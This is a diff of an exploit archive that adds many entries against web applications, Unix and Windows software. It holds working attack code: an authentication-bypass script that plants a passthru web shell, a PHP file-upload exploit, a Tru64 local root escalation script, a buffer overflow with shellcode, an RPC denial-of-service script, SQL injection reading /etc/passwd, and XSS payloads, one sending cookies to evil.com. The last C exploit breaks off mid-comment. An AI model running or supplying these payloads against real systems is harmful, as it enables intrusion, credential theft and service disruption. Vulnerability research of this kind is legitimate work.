Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/boxbilling/bb-admin.php/notification
Content-Length: 66
Cookie: BOXADMR=e%3DZ2pva29AemVyb3NjaWVuY2UubWs%3D%26p%3DZDAzM2UyMmFlMzQ4YWViNTY2MGZjMjE0MGFlYzM1ODUwYzRkYTk5Nw%3D%3D; BOXSID=gsbhumqgrjja1hrei31v3uc4m6
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
message=%22%3E%3Cscript%3Ealert(document.cookie)%3B%3C%2Fscript%3E

33
platforms/php/webapps/30084.php Executable file
View file

@ -0,0 +1,33 @@
###############################################################
# Exploit Title: Wordpress page-flip-image-gallery plugins Remote File
Upload Vulnerability
# Author: Ashiyane Digital Security Team
# Date: 12/06/2013
# Vendor Homepage: http://pageflipgallery.com
# Software Link :
http://downloads.wordpress.org/plugin/page-flip-image-gallery.zip
# Google dork: inurl:/wp-content/plugins/page-flip-image-gallery/
# Tested on: Windows/Linux
###############################################################
1)Exploit :
= = = = = =
<?php
$uploadfile="file.php";
$ch = curl_init("
http://127.0.0.1/wp-content/plugins/page-flip-image-gallery/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('orange_themes'=>"@$uploadfile")); curl_setopt($ch,
CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch); print "$postResult";
?>
http://[Target]/wp-content/uploads/file.php
# #### #### #### #### #### #### #### #### #
# BY T3rm!nat0r5
# E-mail : poya.terminator@gmail.com
# #### #### #### #### #### #### #### #### #

7
platforms/php/webapps/30086.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24156/info
BoastMachine is prone to a cross-site scripting vulnerability.
Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
http://www.target.com/index.php?action=search&item=content&blog=[xss]

9
platforms/php/webapps/30087.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24157/info
Digirez is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials and to launch other attacks.
Digirez 3.4 is vulnerable to these issues.
http://www.example.com/room/info_book.asp?Room_name='><script>alert(1);</script> http://www.example.com/room/week.asp?curYear='><script>alert(1);</script>

9
platforms/php/webapps/30088.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24158/info
Pligg is prone to a security-bypass vulnerability due to a design error when resetting forgotten passwords.
An attacker may exploit this issue to reset account passwords for arbitrary users and then compromise a vulnerable application. This can also aid the attacker in further attacks.
Pligg 9.5 is reported vulnerable; other versions may also be affected.
http://www.example.com/login.php?processlogin=4&username=admin&confirmationcode=1234567891e2f566cbda0a9c855240bf21b8bae030404cad7

7
platforms/php/webapps/30090.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24182/info
phpPgAdmin is prone to a cross-site scripting vulnerability.
Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/redirect.php/%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E?subject=server&server=test

14
platforms/php/webapps/30092.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/24190/info
FlashChat is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects FlashChat 4.7.9; other versions may also be vulnerable.
Further reports suggest that the vulnerable parameter is defined with static content. This BID will be updated pending further investigation.
http://www.example.com/chat/incclasses/connection.php?f_cms=[Shell-Attack]
http://www.example.com/chat/inc/common.php?f_cms=[Shell-Attack]

9
platforms/php/webapps/30094.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24200/info
DGNews is prone to a cross-site scripting vulnerability.
Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
This issue affects DGNews 2.1; other versions may also be affected.
http://www.example.com/footer.php?copyright=[xss]

9
platforms/php/webapps/30095.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24201/info
DGNews is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
Successful exploits could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
DGNews 2.1 is reported vulnerable; other versions may also be affected.
http://www.example.com/news.php?go=newslist&catid=' UNION SELECT 1,`site_title` FROM `news_config` WHERE '1

9
platforms/php/webapps/30097.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24210/info
Uebimiau is prone to multiple input-validation vulnerabilities, including cross-site scripting issues and an information-disclosure issue, because the application fails to properly sanitize user-supplied input.
Attackers can exploit these issues to steal cookie-based authentication credentials, to control how the site is rendered to the user, or to gain access to information that could aid in further attacks.
Uebimiau 2.7.2 and 2.7.10 are vulnerable; other versions may also be affected.
http://www.example.org/demo/pop3/error.php?selected_theme=%3Cscript%3Ealert(document.cookie)%3C/script%3E

10
platforms/php/webapps/30098.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/24210/info
Uebimiau is prone to multiple input-validation vulnerabilities, including cross-site scripting issues and an information-disclosure issue, because the application fails to properly sanitize user-supplied input.
Attackers can exploit these issues to steal cookie-based authentication credentials, to control how the site is rendered to the user, or to gain access to information that could aid in further attacks.
Uebimiau 2.7.2 and 2.7.10 are vulnerable; other versions may also be affected.
http://www.example.org/demo/pop3/error.php?smarty=test
http://www.example.org/demo/pop3/error.php?selected_theme=test

12
platforms/php/webapps/30099.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/24212/info
DGNews is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
Successful exploits could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
DGNews 2.1 is reported vulnerable; other versions may also be affected.
http://www.example.com/news.php?go=fullnews&newsid=-9+union+select+1,2,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),4,5,6,7%20from%2
0news_comment
http://www.example.com/news.php?go=fullnews&newsid=-9+union+select+1,2,load_file(0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F64676E657
7732F61646D696E2F636F6E6E2E706870),4,5,6,7%20from%20news_comment

9
platforms/php/webapps/30101.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24223/info
cpCommerce is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
cpCommerce 1.1.0 is reported vulnerable; other versions may also be affected.
http://www.example.com/cpcommerce/manufacturer.php?id_manufacturer=-9/**/union/**/select/**/pass,LOAD_FILE(0x2F6574632F706173737764),0/**/from/**/cpAccounts/*

232
platforms/php/webapps/30102.php Executable file
View file

@ -0,0 +1,232 @@
source: http://www.securityfocus.com/bid/24227/info
Pheap is prone to an authentication-bypass vulnerability due to a design error.
An attacker can exploit this vulnerability to bypass authentication and execute arbitrary commands in the context of the site administrator.
#!/usr/bin/php -q -d short_open_tag=on
<?php
/*
Explanation:
The user verification routine used in most of the files is:
#####
#
# include("lib/config.php");
# if ($_COOKIE['pheap_login'] != $username){
# header("Location: login.php");
# } else { [CONTINUE EXECUTING CODE] }
#
#####
So basically it's saying "If the value within the cookie pheap_login is not the same value
that is assigned to the $username variable withing lib/config.php then you have to be redirected
to the login page".
So if we know the admin's username we can access any page that uses this authentication method. Also,
we can retrieve all credentials in clear-text. ;)
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
if ($argc<5) {
print "-------------------------------------------------------------------------\r\n";
print " Pheap 2.0 Admin Bypass/Remote Code Execution\r\n";
print "-------------------------------------------------------------------------\r\n";
print "Usage: w4ck1ng_pheap.php [OPTION] [HOST] [PATH] [USER] ([COMMAND])\r\n\r\n";
print "[OPTION] = 0 = Credentials Disclosures\r\n";
print " 1 = Remote Code Execution\r\n";
print "[HOST] = Target server's hostname or ip address\r\n";
print "[PATH] = Path where Pheap is located\r\n";
print "[USER] = Admin's username\r\n";
print "[COMMAND] = Command to execute\r\n\r\n";
print "e.g. w4ck1ng_pheap.php 0 victim.com /pheap/ admin\r\n";
print " w4ck1ng_pheap.php 1 victim.com /pheap/ admin \"ls -lia\"\r\n";
print "-------------------------------------------------------------------------\r\n";
print " http://www.w4ck1ng.com\r\n";
print " ...Silentz\r\n";
print "-------------------------------------------------------------------------\r\n";
die;
}
// Props to rgod for the following functions
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
function make_seed()
{
list($usec, $sec) = explode(' ', microtime());
return (float) $sec + ((float) $usec * 100000);
}
$exploit = $argv[1];
$host = $argv[2];
$path = $argv[3];
$user = $argv[4];
$cmd = $argv[5];
$cmd = urlencode($cmd);
$port=80;$proxy="";
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
if ($exploit==0){
print "-------------------------------------------------------------------------\r\n";
print " Pheap 2.0 Admin Bypass/Remote Code Execution\r\n";
print "-------------------------------------------------------------------------\r\n";
$packet ="GET " . $path . "settings.php HTTP/1.1\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: pheap_login=" . $user . "\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"This is the settings panel")){}
else{echo "...Failed!\r\n"; exit();}
$temp=explode("name=\"user_name\" class=\"ieleft\" value=\"",$html);
$temp2=explode("\" /> <strong>:Username",$temp[1]);
$ret_user=$temp2[0];
echo "[+] Admin User: " . $ret_user . "\r\n";
$temp=explode("name=\"password\" class=\"ieleft\" value=\"",$html);
$temp2=explode("\" /> <strong>:Password",$temp[1]);
$ret_user=$temp2[0];
echo "[+] Admin Pass: " . $ret_user . "\r\n";
$temp=explode("name=\"dbhost\" class=\"ieleft\" id=\"dbhost\" value=\"",$html);
$temp2=explode("\" /> <strong>:Database Host",$temp[1]);
$ret_user=$temp2[0];
echo "[+] Database Host: " . $ret_user . "\r\n";
$temp=explode("name=\"dbuser\" class=\"ieleft\" id=\"dbuser\" value=\"",$html);
$temp2=explode("\" /> <strong>:Database Username",$temp[1]);
$ret_user=$temp2[0];
echo "[+] Database User: " . $ret_user . "\r\n";
$temp=explode("name=\"dbpass\" class=\"ieleft\" id=\"dbpass\" value=\"",$html);
$temp2=explode("\" /> <strong>:Database Password",$temp[1]);
$ret_user=$temp2[0];
echo "[+] Database Pass: " . $ret_user . "\r\n";
print "-------------------------------------------------------------------------\r\n";
print " http://www.w4ck1ng.com\r\n";
print " ...Silentz\r\n";
print "-------------------------------------------------------------------------\r\n";
}
if($exploit==1){
$packet ="GET " . $path . "edit.php?em=file&filename=" . $path . "index.php HTTP/1.1\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: pheap_login=" . $user . "\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode("name=\"filename\" value=\"",$html);
$temp2=explode("\">",$temp[1]);
$fullpath=$temp2[0];
$shell = '<?php echo "<font color=#FFFFFF>...Silentz</font>";ini_set("max_execution_time",0);passthru($_GET[cmd]);echo "<font color=#FFFFFF>...Silentz</font>";?>';
$data = "mce_editor_0_styleSelect=";
$data .= "&mce_editor_0_formatSelect=";
$data .= "&mce_editor_0_fontNameSelect=";
$data .= "&mce_editor_0_fontSizeSelect=0";
$data .= "&mce_editor_0_zoomSelect=100%25";
$data .= "&content=" . urlencode($shell);
$data .= "&filename=" . urlencode($fullpath);
$data .= "&update_text.x=57";
$data .= "&update_text.y=15";
$packet ="POST " . $path . "edit.php?action=update_doc HTTP/1.1\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept: */*\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: pheap_login=" . $user . "\r\n";
$packet.="Referer: http://" . $host.$path . "edit.php?em=file&filename=" . $path . "index.php\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$packet ="GET " . $path . "index.php?cmd=" . $cmd . " HTTP/1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"...Silentz"))
{
print "-------------------------------------------------------------------------\r\n";
print " Pheap 2.0 Admin Bypass/Remote Code Execution\r\n";
print "-------------------------------------------------------------------------\r\n";
$temp=explode("...Silentz</font>",$html);
$temp2=explode("<font color=#FFFFFF>",$temp[1]);
echo "===============================================================\r\n\r\n";
echo $temp2[0];
echo "\r\n===============================================================\r\n";
echo "\r\n[+] Shell...http://" .$host.$path. "index.php?cmd=[COMMAND]\r\n";
print "-------------------------------------------------------------------------\r\n";
print " http://www.w4ck1ng.com\r\n";
print " ...Silentz\r\n";
print "-------------------------------------------------------------------------\r\n";
die;
}
}
?>

7
platforms/php/webapps/30103.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24232/info
Particle Blogger is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/apppath/archives.php?year=2007&month='

1
platforms/php/webapps/4219.txt
View file

@ -1,4 +1,3 @@
[*] Confixx <= PRO 3.3.1 Remote File Inclusion Vulnerability
__________________________________________________________________________

1
platforms/php/webapps/6530.txt
View file

@ -1,4 +1,3 @@
:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[

1
platforms/php/webapps/8167.txt
View file

@ -1,4 +1,3 @@
:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[

1
platforms/php/webapps/9030.txt
View file

@ -1,4 +1,3 @@
----------------------------------------------------------------------
Joomla Component com_k2 (sectionid) SQL injection Vulnerability
----------------------------------------------------------------------

8
platforms/solaris/local/30021.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/23915/info
Sun Microsystems Solaris is prone to a local information-disclosure vulnerability due to a design error.
A local attacker may exploit this issue to access sensitive information, including superuser password information, that may lead to further attacks. A complete compromise is possible.
The following exploit example is available:
$ /opt/SUNWsrspx/bin/srsexec -dvb /etc/shadow OWNED

140
platforms/unix/local/30017.sh Executable file
View file

@ -0,0 +1,140 @@
source: http://www.securityfocus.com/bid/23881/info
HP Tru64 for UNIX is prone to a local privilege-escalation vulnerability.
Exploiting this issue allows local attackers to execute arbitrary code with superuser privileges.
Successful exploits will result in a complete compromise of vulnerable computers. Failed exploit attempts will result in a denial of service.
---------------------8<---------------------8<---------------------
#!/bin/sh
#
# - Author/Credits:
# Daniele Calore; orkaan <at> orkaan.org
#
# - Description:
# HP Tru64 DOP Local Privilege Escalation Vulnerability
#
# UNIX HP Tru64 5.X '/usr/sbin/dop' Local Vulnerability root escalation.
# HP Security bulletin code identification: HPSBTU02211 SSRT071326
# Bugtraq ID: 23881
#
# - Public Released:
# 2007-05-09
#
# - System Affected:
# Tru64 5.1 (ALL) (Last PatchKit: T64v51B20AS0006-20030210 - PK6 - BL20)
# Tru64 5.1A (ALL) (Last PatchKit: T64V51AB24AS0006-20031031 - PK6 - BL24)
# Tru64 5.1B (ALL) (Last PatchKit: T64V51BB27AS0006-20061208 - PK6 - BL26)
#
# - System NOT Tested:
# Tru64 5.0
#
# - System NOT Affected:
# Tru64 4.0x (dop will allways require root password, also for user root)
#
# - More info:
# http://www.orkaan.org/tru64/orkaan_-_exp_Tru64-5.X_SSRT071326.html
#
#
#####################
# Defines:
PATH="/sbin:/usr/sbin/:/bin:/usr/bin"
DOP="/usr/sbin/dop"
# Environment size target.
# Change this value if you have problems.
ENV_TRG=38629
# Sleep in seconds.
# Change this value (bigger) if you have problems.
SLEEP=10
#
#####################
# Credits:
echo "UNIX HP Tru64 5.X '/usr/sbin/dop' Local Vulnerability root escalation."
echo "HP Security bulletin code identification: HPSBTU02211 SSRT071326"
echo "Bugtraq ID: 23881"
echo "Author: Daniele Calore; orkaan <at> orkaan.org"
echo ""
#
#####################
# Checks:
# Check User.
MYUID=`id -u`
if [ ${MYUID} -eq 0 ]; then
echo "Why execute this if you are allready root?"
exit 1
fi
# Check dop binary.
test -u "${DOP}"
if [ $? -ne 0 ]; then
echo "${DOP} binary is without set-user ID bit... Sorry!"
exit 1
fi
# Check exec_disable_arg_limit.
ARG_LIMIT=`sysconfig -q proc exec_disable_arg_limit 2>/dev/null | tail -1 |\
cut -f3 -d" "`
if [ "Z${ARG_LIMIT}" != "Z0" ]; then
echo "exec_disable_arg_limit is set to ${ARG_LIMIT:-none}... Sorry!"
exit 1
fi
#
#####################
# DOPAction Attack:
echo "Ready:"
# Unset Display.
echo "1- Unset DISPLAY."
unset DISPLAY
# Make ENV big enough.
echo "2- Make ENV big enough."
ENV_SIZE=`env | wc -c | tr -cd '[[:digit:]]'`
ENV_SIZE=`expr ${ENV_TRG} - ${ENV_SIZE} - 3`
A=`perl -e "print 'A' x ${ENV_SIZE}`; export A
ENV_SIZE=`env | wc -c | tr -cd '[[:digit:]]'`
echo " Actual ENV size is ${ENV_SIZE}; target is ${ENV_TRG};"
# Create dopAction.
echo "3- Create a dopAction 'shell'.
Remember to delete it.
As root do:
/usr/sbin/sysman -cli -delete row -comp doprc -group dopActions -key1
shell
Remember:
- The script will never end.
- If it does not run change ENV_TRG...
- It is normal to see a message like:
Error occurred trying to update /etc/doprc:
shell already exists in /etc/doprc
(This mean that the BUG is present...)
You have to wait ${SLEEP} seconds.
After this amount of time you will see a: '#' (the root shell prompt).
"
# Fork it in Background.
dop /usr/sbin/sysman -cli -add row -comp doprc -group dopActions \
-data "shell SuperUsers {{/bin/sh *}}" &
# Run the new dopAction.
# Sleep some seconds (maybe you have to change this value).
sleep ${SLEEP}
echo ""
dop shell
exit 0
# EOF
---------------------8<---------------------8<---------------------

13
platforms/windows/dos/30023.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/23926/info
OpenEdge is prone to multiple denial-of-service vulnerabilities because it fails to properly sanitize user-supplied input.
Successful exploits can allow attackers to cause the application to become unresponsive, denying service to legitimate users.
This issue affects OpenEdge 10b; other versions may also be vulnerable.
http://www.example.com/scripts/cgiip.exe/WService=wsbroker1/dict.r
http://www.example.com/scripts/cgiip.exe/WService=wsbroker1/_help.r
http://www.example.com/scripts/cgiip.exe/WService=wsbroker1/_dict.r
http://www.example.com/scripts/cgiip.exe/WService=wsbroker1/_comp.r
http://www.example.com/scripts/cgiip.exe/WService=wsbroker1/_admin.r

137
platforms/windows/dos/30046.py Executable file
View file

@ -0,0 +1,137 @@
source: http://www.securityfocus.com/bid/24017/info
Computer Associates BrightStor ARCserve Backup is prone to multiple denial-of-service vulnerabilities due to memory-corruption issues caused by errors in processing arguments passed to RPC procedures.
A remote attacker may exploit these issues to crash the affected services, resulting in denial-of-service conditions.
The following applications are affected:
BrightStor ARCserve Backup v9.01, r11.1, r11.5, r11 for Windows
BrightStor Enterprise Backup r10.5
CA Server Protection Suite r2,
CA Business Protection Suite r2
CA Business Protection Suite for Microsoft Small Business Server Standard Edition r2
CA Business Protection Suite for Microsoft Small Business Server Premium Edition r2
#!/usr/bin/python
#
# Computer Associates (CA) Brightstor Backup caloggderd.exe DoS
(camt70.dll)
# (Previously Unknown)
#
# There is an issue in camt70.dll when caloggerd is processing a
hostname for a login operation.
# When processing the string, if a null is passed in as an argument, it
will be loaded into ESI
# and then loaded into EDI in which the string processing will read a
null memory location.
#
# .text:0032ADD0 push ecx
# .text:0032ADD1 mov eax, [esp+4+arg_4]
# .text:0032ADD5 push esi
# .text:0032ADD6 mov esi, [esp+8+arg_8] <--null gets loaded
# .text:0032ADDA push edi
# .text:0032ADDB mov edx, [eax]
# .text:0032ADDD mov edi, esi <-- EDI gets set to nulls
# .text:0032ADDF or ecx, 0FFFFFFFFh
# .text:0032ADE2 xor eax, eax
# .text:0032ADE4 repne scasb
#
# This was tested on BrightStor ARCserve Backup 11.5.2.0 (SP2) with the
latest
# CA patches on Windows XP SP2
#
# CA has been notified
#
# Author: M. Shirk
#
# (c) Copyright 2007 (Shirkdog Security) shirkdog_list $ at % hotmail
dot com
#
# Use at your own Risk: You have been warned
#------------------------------------------------------------------------
import os
import sys
import time
import socket
import struct
#------------------------------------------------------------------------
# RPC GetPort request for caloggerd
rpc_portmap_req="\x80\x00\x00\x38\x21\x84\xf7\xc9\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86\xa0\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x09\x82\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x00"
# Begining of RPC Packet
packet="\x80\x00\x00\x58\x31\x46\xD3\xB9\x00\x00\x00\x00\x00\x00\x00\x02"
# Prog ID (caloggerd)
packet+="\x00\x06\x09\x82"
# Operation number 1
packet+="\x00\x00\x00\x01\x00\x00\x00\x01"
# Nulls
packet+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
# Size of hostname, used in the Login
packet+="\x00\x00\x00\x22"
# Hostname, which apparently with the size and the nulls, causes the DoS
packet+="\x41\x41\x41\x41"*8
packet+="\x41\x41\x00\x00"
packet+="\xff\xff\xff\xff"
#------------------------------------------------------------------------
def GetCALoggerPort(target):
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((target,111))
sock.send(rpc_portmap_req)
rec = sock.recv(256)
sock.close()
port1 = rec[-4]
port2 = rec[-3]
port3 = rec[-2]
port4 = rec[-1]
port1 = hex(ord(port1))
port2 = hex(ord(port2))
port3 = hex(ord(port3))
port4 = hex(ord(port4))
port = '%02x%02x%02x%02x' %
(int(port1,16),int(port2,16),int(port3,16),int(port4,16))
port = int(port,16)
print '[+] Sending TCP Packet of Death to Target: %s Port: %s' %
(target,port)
ExploitCALoggerd(target,port)
def ExploitCALoggerd(target,port):
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((target,port))
sock.send(packet)
sock.close()
print '[+] Done...\n[+] caloggerd.exe is dead\n[+] ... or it
will die in a few seconds for you inpatient bastards\n'
if __name__=="__main__":
try:
target = sys.argv[1]
except IndexError:
print '[+] Computer Associates (CA) Brightstor Backup
caloggerd.exe DoS (camt70.dll)'
print '[+] Author: Shirkdog'
print '[+] Usage: %s <target ip>\n' % sys.argv[0]
sys.exit(-1)
print '[+] Computer Associates (CA) Brightstor Backup
caloggerd.exe DoS (camt70.dll)'
print '[+] Author: Shirkdog'
GetCALoggerPort(target)

1
platforms/windows/local/30014.py
View file

@ -1,6 +1,7 @@
# NDPROXY Local SYSTEM privilege escalation
# http://www.offensive-security.com
# Tested on Windows XP SP3
# http://www.offensive-security.com/vulndev/ndproxy-local-system-exploit-cve-2013-5065/
# Original crash ... null pointer dereference

34
platforms/windows/local/30032.rb Executable file
View file

@ -0,0 +1,34 @@
#!/usr/bin/ruby
print '''
Steinberg MyMp3PRO v5.0 Buffer Overflow
Version: 5.0 Build 5.1.0.21
Date found: 04.12.2013
Exploit Author: metacom
Tested on:XP-Sp3-EN
'''
sleep(3)
junk="\x41" * 1044
eip=[0x7C86467B].pack('V')#7C86467B FFE4 JMP ESP kernel32.dll
nops="\x90" * 100 # landing zone
shellcode=("\xba\x50\x3e\xf5\xa5\xda\xd7\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"+
"\x33\x83\xc3\x04\x31\x53\x0e\x03\x03\x30\x17\x50\x5f\xa4\x5e"+
"\x9b\x9f\x35\x01\x15\x7a\x04\x13\x41\x0f\x35\xa3\x01\x5d\xb6"+
"\x48\x47\x75\x4d\x3c\x40\x7a\xe6\x8b\xb6\xb5\xf7\x3d\x77\x19"+
"\x3b\x5f\x0b\x63\x68\xbf\x32\xac\x7d\xbe\x73\xd0\x8e\x92\x2c"+
"\x9f\x3d\x03\x58\xdd\xfd\x22\x8e\x6a\xbd\x5c\xab\xac\x4a\xd7"+ # Calc
"\xb2\xfc\xe3\x6c\xfc\xe4\x88\x2b\xdd\x15\x5c\x28\x21\x5c\xe9"+ # \x00\x0a\x0d
"\x9b\xd1\x5f\x3b\xd2\x1a\x6e\x03\xb9\x24\x5f\x8e\xc3\x61\x67"+
"\x71\xb6\x99\x94\x0c\xc1\x59\xe7\xca\x44\x7c\x4f\x98\xff\xa4"+
"\x6e\x4d\x99\x2f\x7c\x3a\xed\x68\x60\xbd\x22\x03\x9c\x36\xc5"+
"\xc4\x15\x0c\xe2\xc0\x7e\xd6\x8b\x51\xda\xb9\xb4\x82\x82\x66"+
"\x11\xc8\x20\x72\x23\x93\x2e\x85\xa1\xa9\x17\x85\xb9\xb1\x37"+
"\xee\x88\x3a\xd8\x69\x15\xe9\x9d\x86\x5f\xb0\xb7\x0e\x06\x20"+
"\x8a\x52\xb9\x9e\xc8\x6a\x3a\x2b\xb0\x88\x22\x5e\xb5\xd5\xe4"+
"\xb2\xc7\x46\x81\xb4\x74\x66\x80\xd6\x1b\xf4\x48\x37\xbe\x7c"+
"\xea\x47")
buffer=junk + eip + nops + shellcode
File.open('BOF_Steinberg_MyMp3PRO_v5.m3u', 'w') do |bug|
bug.puts (buffer)
bug.close()
end

1
platforms/windows/remote/1460.pm
View file

@ -1,4 +1,3 @@
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the

7
platforms/windows/remote/30016.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/23878/info
RoboHelp is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/project_name/en/frameset-7.html#http://evil.com/cookiethief

344
platforms/windows/remote/30019.c Executable file
View file

@ -0,0 +1,344 @@
source: http://www.securityfocus.com/bid/23906/info
Multiple products by Computer Associates are prone to multiple vulnerabilities that will allow remote attackers to execute arbitrary code on an affected computer.
Successful exploits will allow attacker-supplied arbitrary code to run within the context of the affected server. Failed exploit attempts will likely cause denial-of-service conditions.
/*
----------------------------------------------------------------------
| 48Bits Advisory -=- Privilege Elevation in eTrust Antivirus Agent r8 |
----------------------------------------------------------------------
Affected versions :
I have tested with:
- eTrust Antivirus Agent r8 - http://www3.ca.com/solutions/Product.aspx?ID=156
(With INOCORE.DLL 8.0.403.0) under XPSP2 and W2KSP4)
Description :
eTrust Antivirus r8 is prone to a stack-based buffer overflow vulnerability.
The Affected component is "eTrust Task service" running as a Windows service,
the executable file is located at:
"%PROGRAMFILES%\CA\eTrustITM\InoTask.exe"
eTrust Task service uses a shared file mapping named "INOQSIQSYSINFO" as an
IPC mechanism, this file mapping have a NULL security descriptor so anyone
can view/modify it. This mapping contains information about scheduled tasks,
including a field where is specified the file job´s path.
The vulnerable code is located at IN0CORE.DLL in the function QSIGetQueueID
which internally calls QSIGetQuePath passing a fixed buffer in order to
retrieve the queue path, no validation is done for the buffer size.
In order to exploit the vulnerability, malicious users can modify directly
the buffer through the file mapping with a long file path, so when InnoTask
read it the mentioned stack-based buffer overflow will be triggered.
Technical notes about the exploit:
Although the component was compiled with /GS option is still possible to exploit it:
The IONOQSIQSYSINFO filemapping has enough size to contain a long file path which
after overflowing return address and SEH Handlers will reach the end of the stack,
causing an access exception to be raised, then we can point the exception handler
to a memory containing a (pop,pop,ret) or (call [esp+8]) sequence, this isnt a problem
for W2K or XPSP1 because we have such sequence in a valid offset in the Inocore.dll
itself, but could pose one for WXP-SP2 or W2K3 where exception handlers must be
registered, i have found some addresses valid which can be used at least on my
